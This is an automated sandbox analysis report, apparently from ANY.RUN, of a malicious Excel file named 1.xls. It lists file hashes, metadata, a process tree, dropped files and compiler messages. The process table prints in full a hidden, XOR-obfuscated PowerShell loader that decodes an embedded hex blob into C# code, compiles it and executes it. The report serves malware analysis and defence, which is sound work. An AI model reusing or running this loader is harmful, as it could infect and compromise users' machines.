File name: | 1.xls |
Full analysis: | https://app.any.run/tasks/de392e34-1494-4369-984e-834765b14311 |
Verdict: | Malicious activity |
Analysis date: | May 24, 2019, 14:06:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Last Saved By: Administrator, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri May 24 07:54:11 2019, Last Saved Time/Date: Fri May 24 07:54:11 2019, Security: 0 |
MD5: | 197211E2C79201E8253C04DF609E1193 |
SHA1: | 2DA809D0D63F23438CF9C6BD2BDA1B06540CA289 |
SHA256: | B0801AC513D88A8EC0FBB4249BECD859C0B2DDB86272749C9E5D978A45DE8E11 |
SSDEEP: | 1536:xfk3hOdsylKlgryzc4bNhZFGzE+cL2knAwjBKKLDs3EC5e:1k3hOdsylKlgryzc4bNhZFGzE+cL2knP |
.xls | | | Microsoft Excel sheet (48) |
---|---|---|
.xls | | | Microsoft Excel sheet (alternate) (39.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
LastModifiedBy: | Administrator |
Software: | Microsoft Excel |
CreateDate: | 2019:05:24 06:54:11 |
ModifyDate: | 2019:05:24 06:54:11 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: |
|
HeadingPairs: |
|
CompObjUserTypeLen: | 31 |
CompObjUserType: | Microsoft Excel 2003 Worksheet |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2688 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3256 | powershell -WindowStyle Hidden function x481bf9 { param($l65a9e) $l41cff1 = 'teb148d'; $mb3cb79 = ''; for ($i = 0; $i -lt $l65a9e.length; $i+=2) { $xaf3e2 = [convert]::ToByte($l65a9e.Substring($i, 2), 16); $mb3cb79 += [char]($xaf3e2 -bxor $l41cff1[($i / 2) % $l41cff1.length]); } return $mb3cb79; } $f19a8f6 = '01160b5f5318370d1616545903697e1011585a5f44271c114551554a26100c455d55015a2c0c45514a0b043607434251071116593c3e4d171d0b051167411700000f1f705105130b0d42405107075e6f3b414b0d1a0242624d4b1011084c787b03697e1011585a5f44271c114551554a3a00160a39321401070e58571807180411421454574d0103550d356e0f686811141844544542116f7c08182c0f415b4a105c470954465601185650131818211a11104864570d1a11420c141a23111132435b5b2510011054474b465d386f3b1418445445421114481116090b52144b1015110b52145d1c0000105f14710a00351643144b53150107197d5610241110114e59021250070218181700170b5f5318084d54570702004d4f686811141844544542116f7c08182c0f415b4a105c470954465601185650131818211a11104864570d1a11420c141a281b04067d5d5a1615171b131d65697e4542111418445445124456540d17451145554c0d17450749405d161a452b5f40681006450a06015e5c5c1616435d5603541f5502550b4d4f686811141844544542116f7c08182c0f415b4a105c470954465601185650131818211a11104864570d1a11420c141a321d171644555434060a1654574c465d386f3b1418445445421114481116090b52144b1015110b52145d1c0000105f145a0b1b094244065d06474d2b5f40681006451053565e55414942647d561024111011410a051553501d144d0d1a11425b010f5d47064e115b4d1054100b5f401814120456521d03697e4542111418445445397558542d19150d434010463f00105f515457464b065d581a4854200c454641341b0c0c451405445637165d7957121128075c5b4a1d56494262514c2815161674464a0b06455f1152590807004b6c39324454454211141844071103455d5b44111d1654465644020a0b55145f01115106001c710a00351643144e521050061d14710a003516431450551100071d14510a00451805510902405c4b0a3932697e4542111418445445124456540d17451145554c0d17450b5f40181342015102010e4c5d686811141844544542114f356e544542111418445445421114710a003516431448024307001109180c435004091c40504c5400570d1046455052090509514c54030457085c455d40181d03697e4542111418445445421114180d12454a41520f0616455f0c14710a003516431a6201060a4b3c3e1844544542111418445445424a393244544542111418445445421114184454170745414a0a5454593c3e1844544542111418445445424c3932697e4542111418445445421114182d1a11324546181c4c535457520f4449451106555c015c150406565a48541d5609055a024d4d400201085c45545709020f5116555700550a5345525706010a51105454131d115f796f4211141844544542111418441d0342194c005242030406140559542c0c45644c165a3f07435b11697e4542111418445445421114181f796f42111418445445421114184454454211465d1001170c110503697e45421114184454454211141819796f6f3b14184454454211141844544537785a4c3400174256055d054754420c1410313d0b1661404a4d415e6f3b14184454454211141844544517585a4c44180357500218595455593c3e1844544542111418445445425852184c55105054560b4c0c5d5407525e5358450500515957454942014c0c5458450d44401808125003071d11697e4542111418445445421114181f796f42111418445445421114184454454211465d1001170c110503697e45421114184454454211141819796f421114184454454211141844361c16546f6544135c53040c5c525458424a14081c47544e11044002124942014c01545418593c3e184454454211141844544542785a4c3400174259070c00125250110918291517115955544a35090e5e577023180a00505810575d5e6f3b1418445445421114184454452f50464b0c15094c725b481d5c025b000100004249420118180c47510657030a4854564b0a3932445445421114184454454211535d01400153195a5d13542c0c45644c165c1d5a07025e02434b365e7d561042514a18141344441d5201055a4d58450a02005c0243574e1107115f796f6f3b3d316d230000725851011a114253500b574d07420c14560103453554567b081d000c451c115f796f421114184454454211141844071110585a5f441907540956185954200c475d4a0b1a08075f4016231111245e585c01063503455c10211a130b435b5609110b161f674801170c035d7257081000101f754814180c015040510b1a2103455511445f45406d6856001157010916184f541d5609055a024d4d40045508544504570516115f796f421114184454454211141844160151020d5a4a300a155f58570510230b5d51101c405d535352014c5654010005095240545606040a501650000151095341045704015b541054570100095540575753015a541054570005085340575350010954155000020509544051560101085016515304060d504503570000085445474b1d145506425d00180f356e54454211141844544542111468161b060742471637000410451c5506425d00180f356e796f42111418445445421114184406001644465644445e6f3b141844544542111445697e6c6b41415a081d0642424059101d064242404a0d1a02424900005516035b19474c161d0b05115c5a55470657031d356e54454211141844541e6f3b3d316d071110585a5f440e040457015d5754584213405d0645515a551603697e4542111418445445421114181700170b5f53180c43500409140544271110585a5f4a310812454d03697e454211141844544542111418021b1742195d5610540c420c14085f540c420d14500645560104061628110b05455c03441d45490c140a4d796f4211141844544542111418440f6868111418445445421114184454454211145a1d0000424203590011455f1177570a020010451a6c0b361c16541c5006455601040616370107114546510a134d0b1d140a4d584553071d03697e4542111418445445421114184454454259030d024c45490c1410071c0410181c4b53150107116a181e15030404510b3f5c0c421e140a4d5440424b555e024100511f785d0a13110a6c1d03697e45421114184454454211141819796f6f3b1418445445421114184454451054404d161a450a06015e5c4f6868111418445445421149356e09'; $f19a8f62 = x481bf9($f19a8f6); Add-Type -TypeDefinition $f19a8f62; [l39dad9]::w6d3356(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3436 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\vhxon4gr.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | powershell.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Visual C# Command Line Compiler Exit code: 0 Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | ||||
3608 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES8486.tmp" "c:\Users\admin\AppData\Local\Temp\CSC8485.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft® Resource File To COFF Object Conversion Utility Exit code: 0 Version: 8.00.50727.4940 (Win7SP1.050727-5400) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2688 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR3F5E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KSHSM9Y8F7C4WI8YEYTI.temp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC8485.tmp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.pdb | — | |
MD5:— | SHA256:— | |||
3608 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES8486.tmp | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.dll | — | |
MD5:— | SHA256:— | |||
3436 | csc.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.out | — | |
MD5:— | SHA256:— | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF138168.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3256 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vhxon4gr.0.cs | text | |
MD5:24E5755C647358AEDA109972224650C1 | SHA256:6022BD9DF031B27BBA1537A55AFDBD2D543B5A44680CEECF5C03BE514ABDC0EA | |||
3256 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 |
Process | Message |
---|---|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|
csc.exe |
*** HR originated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302
|
csc.exe |
*** HR propagated: -2147024774
*** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144
|